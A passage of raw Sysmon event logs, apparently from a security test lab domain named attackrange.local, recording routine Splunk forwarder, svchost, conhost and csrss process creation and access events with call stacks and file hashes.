Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081912Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-B2FE-615A-5A01-00000000FD01}1268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081911Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.354{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36BE60FDB8EEE4AD3912D7DC40191610,SHA256=2178447E50DD68766CC390ADF73F69E0836D951DFB62B62C59182C07A37E5043,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081910Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.151{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=890800180579C02E313A20C38F93FC1E,SHA256=E65F0B86084935BA02D2812BAC24000B6E0810D7745808CD9F4C055522CB0A6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081941Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.995{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65E01B48771342FBB9C588E1715C3E37,SHA256=0CB8A3162A97EA6290F224567734DA2C43B76ACFB95884A0A100282A9297D140,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081940Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.885{2FDD8D40-B2FF-615A-5B01-00000000FD01}700408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081939Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.713{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B2FF-615A-5B01-00000000FD01}700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081938Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.713{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081937Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.713{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081936Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.713{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081935Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.713{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081934Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.713{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081933Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.713{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081932Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.713{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081931Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.713{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081930Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.713{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081929Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.713{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B2FF-615A-5B01-00000000FD01}700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081928Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.713{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B2FF-615A-5B01-00000000FD01}700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081927Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.715{2FDD8D40-B2FF-615A-5B01-00000000FD01}700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081926Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:35.479{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=899C01F1503A66923E9332B8A22A13D9,SHA256=D3DBD1E4AA1057672655A4F5BD5C83EB6CF0B482D43A826324152CCDA3B3DA5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104020Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:35.316{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EAFA98ED8DEB20A4BB6ADA095438AA3,SHA256=BA4B3F4DD5A60C8F0F36C87A51FF5120EDDF91C37B25374090144A569A9C0506,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081956Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.669{2FDD8D40-B300-615A-5C01-00000000FD01}32441420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081955Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.481{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80F233FBC752E985AEF26D15D74AA83E,SHA256=BAA1DFD5A74168AD5D6EA3D6807B13BC00899E3DF30B9340794E76E512CB3250,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081954Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.481{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B300-615A-5C01-00000000FD01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081953Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.481{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081952Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.481{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081951Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.481{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081950Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.481{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081949Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.481{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081948Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.481{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081947Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 